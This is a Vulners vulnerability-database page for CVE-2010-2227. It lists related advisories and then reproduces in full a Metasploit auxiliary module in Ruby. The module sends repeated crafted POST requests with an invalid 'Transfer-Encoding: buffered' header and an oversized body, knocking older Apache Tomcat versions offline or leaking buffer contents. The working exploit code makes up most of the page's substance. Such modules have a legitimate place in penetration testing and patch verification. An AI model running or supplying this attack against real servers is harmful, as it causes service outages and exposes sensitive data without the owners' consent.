Vulners
Lucene search
Apache Tomcat Transfer-Encoding Information Disclosure and Denial of Service
🗓️ 31 Aug 2024 00:00:00Reported by Andi, Paulino Calderon, Steve Jones, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 273 Views
| Reporter | Title | Published | Views | Family All 120 |
|---|---|---|---|---|
 | Security fix for the ALT Linux 5 package tomcat6 version 0:6.0.26-alt2_11jpp6 | 18 Oct 201000:00 | – | altlinux |
| Security fix for the ALT Linux 5 package tomcat6 version 0:6.0.26-alt4_16jpp6.M50P.1 | 13 Apr 201100:00 | – | altlinux |
 | Apache Tomcat 7.0.x < 7.0.2 Denial of Service and Information Disclosure | 14 Feb 201100:00 | – | nessus |
| Apache Tomcat 6.0.x < 6.0.28 Multiple Vulnerabilities | 11 Feb 201100:00 | – | nessus |
| Apache Tomcat 7.0.x < 7.0.2 Denial of Service Vulnerability | 14 Feb 201100:00 | – | nessus |
| Apache Tomcat 5.5.x < 5.5.30 Multiple Vulnerabilities | 11 Feb 201100:00 | – | nessus |
| CentOS 5 : tomcat5 (CESA-2010:0580) | 3 Aug 201000:00 | – | nessus |
| Debian DSA-2207-1 : tomcat5.5 - several vulnerabilities | 30 Mar 201100:00 | – | nessus |
| Fedora 12 : tomcat6-6.0.26-3.fc12 (2010-16248) | 2 Nov 201000:00 | – | nessus |
| Fedora 13 : tomcat6-6.0.26-11.fc13 (2010-16270) | 2 Nov 201000:00 | – | nessus |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Tomcat Transfer-Encoding Information Disclosure and DoS',
'Description' => %q{
Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not
properly handle an invalid Transfer-Encoding header, which allows remote attackers
to cause a denial of service (application outage) or obtain sensitive information
via a crafted header that interferes with "recycling of a buffer."
},
'Author' =>
[
'Steve Jones', # original discoverer
'Hoagie <andi[at]void.at>', # original public exploit
'Paulino Calderon <calderon[at]websec.mx>', # metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2010-2227' ],
[ 'OSVDB', '66319' ],
[ 'BID', '41544' ]
],
'DisclosureDate' => '2010-07-09'))
register_options(
[
Opt::RPORT(8000),
OptInt.new('RLIMIT', [ true, "Number of requests to send", 25])
])
end
def run
for x in 1..datastore['RLIMIT']
begin
connect
print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
sploit = "POST / HTTP/1.1\r\n"
sploit << "Host: " + rhost + "\r\n"
sploit << "Transfer-Encoding: buffered\r\n"
sploit << "Content-Length: 65537\r\n\r\n"
sploit << Rex::Text.rand_text_alpha(1) * 65537
sock.put(sploit + "\r\n\r\n")
disconnect
print_error("DoS packet unsuccessful")
rescue ::Rex::ConnectionRefused
print_error("Unable to connect to #{rhost}:#{rport}")
rescue ::Errno::ECONNRESET
print_good("DoS packet successful. #{rhost} not responding.")
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("Couldn't connect to #{rhost}:#{rport}")
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 26.4
EPSS0.80174